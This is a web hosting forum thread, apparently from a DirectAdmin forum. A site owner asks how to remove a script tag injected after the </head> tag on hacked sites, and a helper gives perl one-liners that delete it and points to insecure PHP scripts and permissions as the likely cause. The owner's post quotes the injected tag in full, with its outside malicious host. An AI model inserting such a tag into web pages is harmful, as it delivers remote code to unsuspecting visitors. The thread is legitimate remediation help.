remove script?

V

vogels

Verified User
Joined
Jul 1, 2007
Messages
12
Hi Guys,

I think my website is hacked. On http://www.vebo78.nl/ i get after the </head> tag the script: <script src=http://variety-line.com/_vti_bin/in_dex_.php ></script>

This website is also in the list of google's blocked sites.

I got a few websites on my server with this script (all of them through the same account of DA), other sites on my server (through other accounts in DA) are clean.

How can i remove this??

Thanks in advice.
 
Do you have shell access?

Code: 
perl -pi -e 's/\<script src=http:\/\/variety-line.com\/_vti_bin\/in_dex_.php \>\<\/script\>//' filename

or

Code: 
perl -pi -e 's/\<script src=http:\/\/variety-line.com\/_vti_bin\/in_dex_.php \>\<\/script\>//' *.html
 
Last edited:
Hi,

Thanks for your reply.

The first line won't work on my server, i got an error. After the second line i got no error, but the script is still in my website.
 
Did you read the command?

In the first one you have to replace filename with the actual filename.

In the second one you have to replace *.html with the actual file extension. If you have php scripts then you have to use *.php.
 
floyd said:
Did you read the command?

In the first one you have to replace filename with the actual filename.

In the second one you have to replace *.html with the actual file extension. If you have php scripts then you have to use *.php.
Click to expand...

I'm sorry floyd but i don't understand.

I don't know where to look what's causing the problem. I mean where the Vulnerable is and what it exactly does. The one thing i know is that it's adding a line (script) after the </head> tag.
 
I don't know what you are asking now. You had asked about removing the script from your files. I gave you that and showed you how to use it. If you want to know how the script got inserted into your files to begin with then you need to hire a security expert to audit your system.
 
sorry if i asked the question wrong.

I only mean that someone put some vulnerable on my server with a direct admin account. This vulnerable add a script after the </head> tag. I want to know where and what to look for and how i can remove it.

I didn't mean to upset you.
 
So what do you want? Do you want to know how to remove the extra line in your files or how the extra line got there?

And no it was not with a DirectAdmin account.
 
floyd said:
So what do you want? Do you want to know how to remove the extra line in your files or how the extra line got there?

And no it was not with a DirectAdmin account.
Click to expand...

Both. But how you know that it not was with a DA account?
 
They would have to know your username and password to do it with DA.

This type of thing happens most often because of an insecure php script that you are running and insecure file permissions.
 
You must log in or register to reply here.
Back
Top